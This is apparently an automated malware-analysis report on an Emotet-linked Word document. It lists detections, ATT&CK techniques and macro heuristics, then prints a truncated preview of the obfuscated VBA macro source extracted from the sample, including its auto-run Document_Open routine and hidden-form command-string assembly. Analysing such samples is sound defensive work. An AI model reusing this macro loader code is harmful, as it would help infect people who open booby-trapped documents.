Verdict: MALICIOUS
Risk Score: 262

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution

Malware Insights: The sample contains VBA macros, including a Document_Open macro and a hidden UserForm command stager, which are indicative of Emotet activity. The ClamAV detection name 'Doc.Downloader.Emotet-7464930-0' further supports this attribution. The macros likely execute code to download and run a second-stage payload.
Heuristics (7):
- ClamAV: Doc.Downloader.Emotet-7464930-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7464930-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11000 bytes |

SHA-256: 85646354822f474207c7388c28da3b9b8065405706f8cea7b437443a622dca8a

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Rnuekdgnz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Aklhsdytvadu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Fnwyraaizzj = Ogjykxkgdc
Yirgutaiekt = 820
Ileuznrbp = ("Laurie")
Lhnryicl = (672)
Dim Trjbegijg As Integer
Dim Rpcmgmeotoi As Integer
Dim Vmfjkwiigzo As Integer
Dim Suhisjqqtsle As String
Dim Xwsuldvgrazyk As Double
Dim Kqntktkhk As Boolean
Dim Xxbutesaklofd As Integer
Mchjtyul = (575)
Dim Ylhcnphx As Double
Xexgugjlt = ("Eos voluptate eos ab.")
Jekgizbcad = (603)
Dim Tvtkxxvghrjc As Double
Aompjrmro = Wepgulckmdkbv
Xpcsuhydzmq = Ufbhmobsganf
Vbqnrdvuxovm = "Enim commodi sit eveniet."
Bqtebhqgcdphk = 509
Kqlqkuic = Aarzkjfwlsrg
Yzpnguntveyx = 568
Sctlzdxzxdrqf = ("Magni facere officia.")
Ukehuslfuvtig = (229)
Dim Bmhheiyfgf As Integer
Dim Blwqpswbutqie As Integer
Dim Yqgvqukcejyqo As Double
Dim Ybatjtxfe As Integer
Dim Dshvycxlap As Boolean
Dim Ddqjsgrbif As Integer
Dim Pikxdakcegrsu As Integer
Vtcupyqwqs = (457)
Dim Znpaxdlgp As Double
Izexfxmypjuvh = ("Josefina")
Zxymueuulo = (463)
Dim Tpjbvdutv As Boolean
Lzeuuwer = Ndnidxvoesjq
Jfhzrnnpoxnm = Zyhxhlglvt
Yfqrruill = "Nostrum maxime."
Fzuhxoqvrgk = 328
Ftuoycmovq = Xnyirdfi
Kxjxzxkg = 755
Wqumxsmxeav = ("Omnis quos voluptas.")
Bhyicmebwdf = (701)
Dim Eacpepjcdgsll As Boolean
Dim Hdifajiqboh As Double
Dim Nanpdanl As Integer
Dim Vgamxagwqnn As String
Dim Uzinwkbawuhp As String
Dim Dikkfmomzzwk As Boolean
Dim Sqhothspunrb As Integer
Ylswthcngch = (144)
Dim Iajqmugi As String
Swwanoxtesa = ("Magnam est.")
Gaqisekegld = (107)
Dim Lxfgngsyaax As Double
Zijdodumcpv = Dvilksqyczn
Uvpgzsbde = Dxapcjhjuycxq
Eqqwjvgjizx = "Animi saepe."
Cjlytmimsav = 254
Odmoouhgcoht
End Sub
Attribute VB_Name = "Afvutucle"
Attribute VB_Base = "0{6D21C294-5A0A-46C4-9146-94AE55B0D5C4}{ECBC2FEA-BBAE-4612-B6FE-B738BF045118}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Ixcmyxdxrtr"
Function Wzwxawzlswk()
Dnasihwb = Fgfpxyxtmweo
Kgqeccvwwx = 687
Rjjjpfjvbvqq = ("Phil")
Oowkxpxphcqs = (890)
Dim Wjjhaghokdhye As String
Dim Opawhohzmz As Double
Dim Cbgswgkzsmip As Integer
Dim Zdtczkcftnq As String
Dim Kojxiblfmek As Integer
Dim Tvschkvupdfk As Integer
Dim Rwitcbpakio As String
Pimzjrhrgmq = (400)
Dim Awukdnimu As Integer
Lhjbskjng = ("Aliquam cumque modi.")
Mcdwssxkj = (948)
Dim Wasfzebrcv As Double
Obhfywdcz = Kshhuqojymyl
Mlfmptkmup = Myogpnmgin
Gbombvqqywmlx = "Debitis quod ut magnam."
Rjxxsmjdpu = 92
Xbvbgxrxhz = Rnuekdgnz.Aklhsdytvadu
Bjvaaazo = Ebrbgfeiy
Fvdfpizttorkx = 780
Kgczsxalu = ("Vero ipsa atque id.")
Nadhssfd = (18)
Dim Sukszuwtmqt As Boolean
Dim Uxfyjzfk As String
Dim Nvzpmvyftkrsl As Boolean
Dim Scdrhtisz As String
Dim Muvdqeiyxx As Integer
Dim Kxolakicm As String
Dim Qxbsbdedahc As Integer
Jptnjnvks = (403)
Dim Tthihqgxycfg As Boolean
Hvsuzxiojb = ("Sed.")
Uszshxaizhv = (905)
Dim Kaekbejeccrd As Integer
Zkekgyqvnygv = Glzavypxd
Xalsqhpre = Uxoyeomgegwdy
Rhrechbc = "Sapiente quas necessitatibus ullam velit iure dolorem."
Fdxqqedeiqclx = 969
Ipiwqzcqevo = Xbvbgxrxhz + Afvutucle.Gkecxtky + Afvutucle.Tkmteuts + Afvutucle.Uizvcuedhy
Pwbqcbdu = Pkaiykfojxne
Gbreyzwllbfk = 885
Quvnkmzu = ("Voluptas aut sed nesciunt.")
Uowdppoki = (33)
Dim Akzvaxdzyc As Integer
Dim Eyobaubu As Integer
Dim Kjkctwvnv As String
Dim Rpkwrjpwuydgk As Boolean
Dim Bnoqhmxwz As String
Dim Xdhdlhmfni As Integer
Dim Iklysggdz As Boolean
Uiyftmutkgf = (676)
Dim Oqmwtfewxh As Integer
Wofpsmlmo = ("Reprehenderit explicabo.")
Nctttotydyyj = (673)
Dim Kkuhswatzxxp As Double
Utzycuzualkh = Cgxfdvibqf
Vtcvvekbejz = Guqkiwlsr
Zsliksctcm
... (truncated)